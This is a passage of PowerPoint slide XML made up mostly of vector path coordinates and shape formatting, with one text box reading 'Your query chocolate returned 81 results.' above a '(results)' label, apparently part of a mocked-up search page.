                  <a:lnTo>
                    <a:pt x="188150" y="16167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187960" y="17691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187782" y="19215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185674" y="23329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185153" y="23774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184556" y="24003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183896" y="24003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="24003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="62839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180987" y="62839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181660" y="62839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185343" y="72212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185343" y="74447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185343" y="76682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182778" y="85775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182257" y="86194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181660" y="86398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180987" y="86398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="86398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="140195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136677" y="141008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136448" y="141719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136004" y="142316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135559" y="142913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134759" y="143408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133604" y="143827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132448" y="144233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130949" y="144551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129082" y="144767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127228" y="144995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124841" y="145110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121945" y="145110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119113" y="145110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116751" y="144995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114846" y="144767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112953" y="144551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107937" y="142316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107442" y="141719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="141008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="140195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="9258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107200" y="5994"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108038" y="3632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109715" y="2171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111391" y="723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113461" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115912" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="10668">
              <a:solidFill>
                <a:srgbClr val="4579B8"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6869789" y="2311872"/>
              <a:ext cx="532206" cy="156451"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6406175" y="2315314"/>
              <a:ext cx="234315" cy="149860"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="234315" h="149860">
                  <a:moveTo>
                    <a:pt x="166217" y="1892"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170599" y="1892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174104" y="1955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185915" y="4686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186550" y="5499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187083" y="6616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187528" y="8039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232181" y="136067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233070" y="138747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233629" y="140868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233857" y="142430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234073" y="143992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233781" y="145161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232956" y="145935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232143" y="146723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230695" y="147205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228612" y="147396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226529" y="147574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223659" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220014" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216217" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203936" y="145440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203492" y="144843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203123" y="144068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202818" y="143090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193116" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138861" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129717" y="142316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129412" y="143357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129019" y="144233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128536" y="144932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128054" y="145643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127279" y="146202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126199" y="146608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125120" y="147015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123596" y="147294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121615" y="147447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119646" y="147599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117055" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113855" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110439" y="147675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107759" y="147561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105829" y="147332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103885" y="147116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102552" y="146570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101803" y="145719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101066" y="144868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100799" y="143649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101028" y="142087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101244" y="140525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147231" y="7696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151650" y="2844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152946" y="2438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154749" y="2171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157060" y="2057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159359" y="1955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162420" y="1892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166217" y="1892"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="234315" h="149860">
                  <a:moveTo>
                    <a:pt x="50901" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54317" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57746" y="254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61163" y="774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64592" y="1295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78689" y="5918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81000" y="7023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84772" y="10604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85039" y="11125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85940" y="18821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85940" y="20764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85940" y="22910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85890" y="24739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85775" y="26225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85661" y="27711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85483" y="28943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85216" y="29908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84962" y="30873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84594" y="31584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84099" y="32029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83616" y="32473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82969" y="32702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82156" y="32702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81330" y="32702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80035" y="32181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78244" y="31140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76453" y="30099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74269" y="28968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71653" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69049" y="26504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66039" y="25387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62623" y="24384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59194" y="23380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55435" y="22885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51346" y="22885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48145" y="22885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45351" y="23266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42976" y="24053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40589" y="24828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38595" y="25908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36995" y="27292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35394" y="28663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34213" y="30314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33426" y="32258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32651" y="34188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32257" y="36233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32257" y="38392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32257" y="41592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41909" y="52959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44856" y="54787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48183" y="56502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51904" y="58089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55625" y="59690"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84607" y="77406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87515" y="80568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89852" y="84289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91643" y="88569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93421" y="92849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94322" y="97891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94322" y="103695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94322" y="111277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78574" y="138010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73748" y="141846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68084" y="144729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61607" y="146672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55143" y="148602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48221" y="149567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40855" y="149567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35864" y="149567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31229" y="149161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26949" y="148336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22682" y="147523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2679" y="138404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1714" y="137439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015" y="136042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609" y="134226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="132397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="126352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="124040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952" y="116751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1282" y="115785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727" y="115100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2285" y="114693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2844" y="114274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3492" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4241" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5283" y="114071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6756" y="114693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8648" y="115912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10540" y="117144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12979" y="118503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15963" y="119989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18935" y="121475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22491" y="122834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26619" y="124066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30746" y="125298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35534" y="125907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40957" y="125907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44538" y="125907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57759" y="120992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59728" y="119430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61239" y="117500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62280" y="115189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63322" y="112877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63842" y="110312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63842" y="107492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63842" y="104216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62953" y="101409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61163" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59385" y="96723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57061" y="94627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54190" y="92811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51320" y="90982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48069" y="89281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44424" y="87680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40779" y="86080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6921" y="61468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="47663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="41630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2451" y="34709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16687" y="10325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21043" y="6858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26174" y="4279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32092" y="2565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38011" y="850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44272" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50901" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="10668">
              <a:solidFill>
                <a:srgbClr val="4579B8"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="object 24"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6266686" y="2549651"/>
              <a:ext cx="2570987" cy="109727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6307703" y="2583126"/>
              <a:ext cx="2486660" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2486659">
                  <a:moveTo>
                    <a:pt x="2486139" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="4F81BD"/>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6315455" y="3014467"/>
              <a:ext cx="2481071" cy="605019"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="object 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6361760" y="3038132"/>
              <a:ext cx="2385695" cy="509905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2385695" h="509904">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2385377" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2385377" y="509485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="509485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8410261" y="3494264"/>
            <a:ext cx="3327400" cy="1038361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="121917" marR="739968">
              <a:lnSpc>
                <a:spcPct val="101699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="-33" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chocolate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="-940" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>returned</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>81</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" spc="-27" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>results.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="23706" algn="ctr">
              <a:spcBef>
                <a:spcPts val="1220"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(results)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9372972" y="2769852"/>
            <a:ext cx="1539240" cy="103293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1154429" h="77469">
                <a:moveTo>
                  <a:pt x="1154163" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="76949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1154163" y="76949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1154163" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9356039" y="2746826"/>
            <a:ext cx="1547707" cy="119755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
